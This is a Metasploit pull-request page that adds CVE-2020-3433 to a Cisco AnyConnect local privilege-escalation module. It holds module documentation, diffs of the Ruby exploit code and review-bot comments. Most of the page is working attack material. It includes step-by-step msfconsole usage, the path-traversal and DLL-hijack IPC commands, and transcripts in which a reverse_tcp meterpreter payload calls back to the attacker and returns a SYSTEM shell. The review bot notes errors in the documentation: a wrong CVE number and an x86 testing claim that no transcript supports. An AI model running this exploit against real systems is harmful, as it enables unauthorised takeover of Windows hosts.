Land #14187, Added CVE-2020-3433 module
Merge branch 'land-14187' into upstream-master
commit 3aeeede4a6
@ -0,0 +1,224 @@
## Vulnerable Application

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
to execute code on the affected machine with with system level privileges.

Both attacks consist in sending a specially crafted IPC request to the TCP
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
Secure Mobility Agent service. This service will then launch the vulnerable
installer component (`vpndownloader`), which copies itself to an arbitrary
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
executed with system privileges. Since `vpndownloader` is also vulnerable to DLL
hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same
location `vpndownloader` will be copied to get code execution with system
privileges.

The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
successfully tested against Cisco AnyConnect Secure Mobility Client versions
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).

AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.

## Install the Application

1. Unzip the AnyConnect package
2. Open the extracted folder
3. Run `Setup.exe`
4. Select `Core & VPN` only (no need to install the full package)
5. Click `Install Selected`
6. Confirm you want to install this specific version of Anyconnect (click `OK`)
7. Accept the EULA (click `Accept`)
8. `Installation complete` (click `OK`)... enjoy

Or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and
follow the installation steps with the default options.

## Verification Steps

1. Start msfconsole
2. Get a session with non-administrative privileges
3. Do: ```use exploit/windows/local/anyconnect_lpe```
4. Do: ```set SESSION <SESSION>```
5. Do: ```set payload windows/meterpreter/reverse_tcp```
6. Do: ```set LHOST <LHOST>```
7. Do: ```set LPORT <LPORT>```
8. Do: ```check```
9. Do: ```run```
10. You should get a new session as the SYSTEM user

## Options
### INSTALL_PATH
Set Cisco AnyConnect Secure Mobility Client installation path (where
`vpndownloader.exe`should be found). It will be automatically detectedif not set.

### CVE
Set the CVE to use (CVE-2020-3153 or CVE-2020-3433). Default: CVE-2020-3433.

### ForceExploit

Set this to `true` to override the `check` result during exploitation.

## Scenarios

### Windows 10 version 1909 (x64) with AnyConnect 4.8.3052 - CVE-2020-3433

```
msf5 exploit(windows/local/anyconnect_lpe) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
lhost => 192.168.1.24
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
lport => 4445
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3433
CVE => CVE-2020-3433
msf5 exploit(windows/local/anyconnect_lpe) > check

[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
msf5 exploit(windows/local/anyconnect_lpe) > run

[*] Started reverse TCP handler on 192.168.1.24:4445
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
[*] "-ipc" argument needed
[*] Creating directory C:\Users\ATGO\AppData\Local\Temp\16Nkpr
[*] Meterpreter Session
[*] C:\Users\ATGO\AppData\Local\Temp\16Nkpr created
[*] Writing the payload to C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=76731 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 288 bytes)
[*] Sending stage (176195 bytes) to 192.168.1.20
[*] Meterpreter session 3 opened (192.168.1.24:4445 -> 192.168.1.20:44712) at 2020-09-01 14:12:05 +0200
[+] Deleted C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll
[+] Deleted C:\Users\ATGO\AppData\Local\Temp\16Nkpr
[*] Shutdown the socket

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : W
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : fr_FR
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3153

```
msf5 exploit(windows/local/anyconnect_lpe) > set session 4
session => 4
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
lhost => 192.168.1.24
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
lport => 4445
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3153
cve => CVE-2020-3153
msf5 exploit(windows/local/anyconnect_lpe) > check

[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
msf5 exploit(windows/local/anyconnect_lpe) > run

[*] Started reverse TCP handler on 192.168.1.24:4445
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
[*] "-ipc" argument needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=29278 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\iZnG\iZnG\iZnG\iZnG\../../../../vpndownloader.exe -"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 270 bytes)
[*] Sending stage (176195 bytes) to 192.168.1.20
[*] Meterpreter session 5 opened (192.168.1.24:4445 -> 192.168.1.20:45098) at 2020-09-01 14:23:13 +0200
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
[*] Shutdown the socket

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : ATGO-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```

### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3433

```
msf5 exploit(windows/local/anyconnect_lpe) > set session 4
session => 4
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
lhost => 192.168.1.24
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
lport => 4445
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3433
cve => CVE-2020-3433
msf5 exploit(windows/local/anyconnect_lpe) > check

[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
msf5 exploit(windows/local/anyconnect_lpe) > run

[*] Started reverse TCP handler on 192.168.1.24:4445
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
[*] "-ipc" argument needed
[*] Creating directory C:\Users\atgo\AppData\Local\Temp\fPTN4o
[*] Meterpreter Session
[*] C:\Users\atgo\AppData\Local\Temp\fPTN4o created
[*] Writing the payload to C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=88243 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 288 bytes)
[*] Sending stage (176195 bytes) to 192.168.1.20
[*] Meterpreter session 6 opened (192.168.1.24:4445 -> 192.168.1.20:45102) at 2020-09-01 14:24:48 +0200
[+] Deleted C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll
[+] Deleted C:\Users\atgo\AppData\Local\Temp\fPTN4o
[*] Shutdown the socket

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : ATGO-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```
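Review bot: the "Vulnerable Application" section names "the CVE-2020-3434 exploit" where every other mention in this file, and the module's `CVE` option, say CVE-2020-3433; fix the identifier before this lands, since readers will grep the docs by CVE. In the same section "with with system level privileges" doubles a word and "Both attacks consist in sending" should read "consist of". Under `### INSTALL_PATH` two spaces are missing ("`vpndownloader.exe`should", "detectedif"). The tested-version list also mixes "4.7.04056" and "4.7.4056" for what the scenarios show is the same build (`4.7.4056.0.0`); use one form, preferably the zero-padded one Cisco's advisories use, so the list can be matched against them.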
@ -1,148 +0,0 @@
## Vulnerable Application

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations as the SYSTEM user.

The attack consists of sending a specially crafted IPC request to the TCP port
62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
Mobility Agent service. This service will then launch the vulnerable installer
component (`vpndownloader`), which copies itself to an arbitrary location
before being executed as the SYSTEM user. Since `vpndownloader` is also
vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
at the same location `vpndownloader` is copied to get code execution as the
SYSTEM user.

This exploit has been successfully tested against Cisco AnyConnect Secure
Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86).

AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.

## Install the Application

1. Unzip the AnyConnect package
2. Open the extracted folder
3. Run `Setup.exe`
4. Select `Core & VPN` only (no need to install the full package)
5. Click `Install Selected`
6. Confirm you want to install this specific version of Anyconnect (click `OK`)
7. Accept the EULA (click `Accept`)
8. `Installation complete` (click `OK`)... enjoy

Or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and
follow the installation steps with the default options.

## Verification Steps

1. Start msfconsole
2. Get a session with non-administrative privileges
3. Do: ```use exploit/windows/local/anyconnect_path_traversal_lpe```
4. Do: ```set SESSION <SESSION>```
5. Do: ```set payload windows/meterpreter/reverse_tcp```
6. Do: ```set LHOST <LHOST>```
7. Do: ```set LPORT <LPORT>```
8. Do: ```check```
9. Do: ```run```
10. You should get a new session as the SYSTEM user

## Options
### ForceExploit

Set this to `true` to override the `check` result during exploitation.

## Scenarios

### Windows 10 version 1909 (x64) with AnyConnect 4.7.4056

```
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
SESSION => 8
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
LHOST => 172.16.60.1
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
LPORT => 4445
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check

[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run

[*] Started reverse TCP handler on 172.16.60.1:4445
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
[*] "-ipc" argument needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=18201 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe -"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 270 bytes)
[*] Sending stage (176195 bytes) to 172.16.60.202
[*] Meterpreter session 9 opened (172.16.60.1:4445 -> 172.16.60.202:49765) at 2020-06-19 19:35:29 +0200
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
[*] Shutdown the socket

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-UUQE0B4
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```

### Windows 7 SP1 (x86) with AnyConnect 4.5.5030

```
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
SESSION => 8
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
LHOST => 172.16.60.1
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
LPORT => 4445
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check

[*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run

[*] Started reverse TCP handler on 172.16.60.1:4445
[*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
[*] "-ipc" argument not needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] IPC Command: "CAC-nc-install C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe -"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 247 bytes)
[*] Sending stage (176195 bytes) to 172.16.60.134
[*] Meterpreter session 10 opened (172.16.60.1:4445 -> 172.16.60.134:49218) at 2020-06-19 19:41:53 +0200
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
[*] Shutdown the socket

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN7-DEV
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
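Review bot: deleting this file drops the only Windows 7 SP1 (x86) scenario (AnyConnect 4.5.5030, 32-bit install path `C:\Program Files\Cisco\...`, and the only run that exercises the `"-ipc" argument not needed` code path), yet the replacement documentation still states that the CVE-2020-3153 exploit was tested on Windows 7 SP1 (x86) while both of its Windows 7 scenarios report `Architecture : x64`. Either carry this x86 scenario over to the new file (renaming the prompt to `exploit(windows/local/anyconnect_lpe)` and adding `set CVE CVE-2020-3153`) or drop the x86 claim from the new text so the documentation only asserts what its transcripts show.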
@ -16,31 +16,39 @@ class MetasploitModule < Msf::Exploit::Local
super(
update_info(
info,
'Name' => 'Cisco AnyConnect Priv Esc through Path Traversal',
'Name' => 'Cisco AnyConnect Privilege Escalations (CVE-2020-3153 and CVE-2020-3433)',
'Description' => %q{
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.

The attack consists in sending a specially crafted IPC request to the TCP port
62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
Mobility Agent service. This service will then launch the vulnerable installer
component (`vpndownloader`), which copies itself to an arbitrary location
before being executed with system privileges. Since `vpndownloader` is also
vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
at the same location `vpndownloader` will be copied to get code execution with
system privileges.
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
to execute code on the affected machine with with system level privileges.

This exploit has been successfully tested against Cisco AnyConnect Secure
Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86).
Both attacks consist in sending a specially crafted IPC request to the TCP
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
Secure Mobility Agent service. This service will then launch the vulnerable
installer component (`vpndownloader`), which copies itself to an arbitrary
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
executed with system privileges. Since `vpndownloader` is also vulnerable to DLL
hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same
location `vpndownloader` will be copied to get code execution with system
privileges.

The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
successfully tested against Cisco AnyConnect Secure Mobility Client versions
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yorick Koster', # original PoC, analysis
'Antoine Goichot (ATGO)', # PoC
'Christophe De La Fuente' # msf module
'Yorick Koster', # original PoC CVE-2020-3153, analysis
'Antoine Goichot (ATGO)', # PoC CVE-2020-3153, original PoC for CVE-2020-3433, update of msf module
'Christophe De La Fuente' # msf module for CVE-2020-3153
],
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
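Review bot: the new 'Description' text has the same two errors as the new documentation file, "with with system level privileges" and "the CVE-2020-3434 exploit" where CVE-2020-3433 is meant (the 'Name' line and the references in this module only know 3153 and 3433); fix both copies together. Minor wording in the same block: "Both attacks consist in sending" reads better as "consist of", and the last tested build is written "4.7.4056" while the same version appears as "4.7.04056" two lines earlier; use one form.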
@ -58,9 +66,11 @@ class MetasploitModule < Msf::Exploit::Local
[
['URL', 'https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj'],
['CVE', '2020-3153']
['CVE', '2020-3153'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW'],
['CVE', '2020-3433']
],
'DisclosureDate' => 'Feb 19 2020',
'DisclosureDate' => 'Aug 05 2020',
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
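Review bot: 'DisclosureDate' moves from 'Feb 19 2020' to 'Aug 05 2020', but the module still exploits CVE-2020-3153, whose references (the SSD advisory and the cisco-sa-ac-win-path-traverse advisory, both kept in this list) carry the earlier date. A module that covers two bugs should keep the earliest disclosure of what it exploits, so either leave 'Feb 19 2020' in place or note in the description that the date refers to CVE-2020-3433 only. Keeping the CVE entry next to the advisory it belongs to, as done here, is fine.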
@ -74,7 +84,8 @@ class MetasploitModule < Msf::Exploit::Local
false,
'Cisco AnyConnect Secure Mobility Client installation path (where \'vpndownloader.exe\''\
' should be found). It will be automatically detected if not set.'
])
]),
OptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-3433', ['CVE-2020-3433', 'CVE-2020-3153']])
]

register_advanced_options [
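Review bot: the 'CVE' OptEnum description, 'Vulnerability to use', could state which builds each value applies to, since a user who picks CVE-2020-3153 on a 4.8.x client gets a Safe result from the new `check` and nothing in `show options` tells them the other value would work. Something like 'Vulnerability to use (CVE-2020-3153: versions < 4.8.02042, CVE-2020-3433: versions < 4.9.00086)' matches the fixed versions hard-coded in `check`.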
@ -163,12 +174,19 @@ class MetasploitModule < Msf::Exploit::Local
return CheckCode.Unknown('Unable to retrieve vpndownloader.exe file version')
end

patched_version = Gem::Version.new('4.8.02042')
cve_2020_3153 = (datastore['CVE'] == 'CVE-2020-3153')

patched_version_cve_2020_3153 = Gem::Version.new('4.8.02042')
patched_version_cve_2020_3433 = Gem::Version.new('4.9.00086')
@ac_version = Gem::Version.new(version.join('.'))
if @ac_version < patched_version
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version}.")
if @ac_version < patched_version_cve_2020_3153
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version_cve_2020_3153} (CVE-2020-3153 & CVE-2020-3433).")
elsif (@ac_version < patched_version_cve_2020_3433) && !cve_2020_3153
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version_cve_2020_3433} (CVE-2020-3433).")
elsif (@ac_version < patched_version_cve_2020_3433) && cve_2020_3153
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version_cve_2020_3153} (However CVE-2020-3433 can be used).")
else
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version}.")
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version_cve_2020_3433}.")
end
end
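Review bot: the two `elsif` branches test the same `@ac_version < patched_version_cve_2020_3433` condition and differ only on `cve_2020_3153`, so one `elsif` with an inner `if cve_2020_3153` is easier to read; simpler still, pick the fixed version for the selected CVE once (`patched = cve_2020_3153 ? patched_version_cve_2020_3153 : patched_version_cve_2020_3433`) and compare once. Two messages could also be more actionable: the Safe text "(However CVE-2020-3433 can be used)" would serve better as "set CVE CVE-2020-3433", and a client at or above 4.9.00086 with CVE-2020-3153 selected falls through to the final `else` and reports ">= 4.9.00086" even though 4.8.02042 is the fix for the CVE the user chose.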
@ -198,8 +216,18 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status('"-ipc" argument not needed')
end

program_data_path = get_env('ProgramData')
dbghelp_path = "#{program_data_path}\\Cisco\\dbghelp.dll"
cve_2020_3153 = (datastore['CVE'] == 'CVE-2020-3153')
if cve_2020_3153
program_data_path = get_env('ProgramData')
dbghelp_path = "#{program_data_path}\\Cisco\\dbghelp.dll"
else
temp_path = get_env('TEMP')
junk = Rex::Text.rand_text_alphanumeric(6)
temp_path << "\\#{junk}"
mkdir(temp_path)
dbghelp_path = "#{temp_path}\\dbghelp.dll"
end

print_status("Writing the payload to #{dbghelp_path}")

begin
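Review bot: `temp_path = get_env('TEMP')` is used without a nil check, so if the variable cannot be read from the session `temp_path << "\\#{junk}"` raises NoMethodError on nil instead of a clean `fail_with`; the pre-existing `get_env('ProgramData')` has the same gap, and guarding both before building the paths would be consistent. `cve_2020_3153` is also recomputed here from `datastore['CVE']` exactly as in `check`; a one-line helper such as `def cve_2020_3153?; datastore['CVE'] == 'CVE-2020-3153'; end` removes the duplication. Finally, `mkdir(temp_path)` creates a directory but no `register_dir_for_cleanup(temp_path)` is visible in this hunk; the documentation transcripts do show the directory being deleted, so if that registration lives elsewhere in the module, ignore this point.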
@ -210,12 +238,17 @@ class MetasploitModule < Msf::Exploit::Local
fail_with(Failure::NotFound, e.message)
end

# vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
# normal process will copy the file to
# "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
register_file_for_cleanup("#{program_data_path}\\Cisco\\vpndownloader.exe")
junk = Rex::Text.rand_text_alphanumeric(4)
cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
if cve_2020_3153
# vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
# normal process will copy the file to
# "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
register_file_for_cleanup("#{program_data_path}\\Cisco\\vpndownloader.exe")
junk = Rex::Text.rand_text_alphanumeric(4)
cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
else
cac_cmd << "\t#{@installation_path}\\vpndownloader.exe\t#{dbghelp_path}\""
end

vprint_status("IPC Command: #{cac_cmd}")

cipc_msg = CIPCMessage.new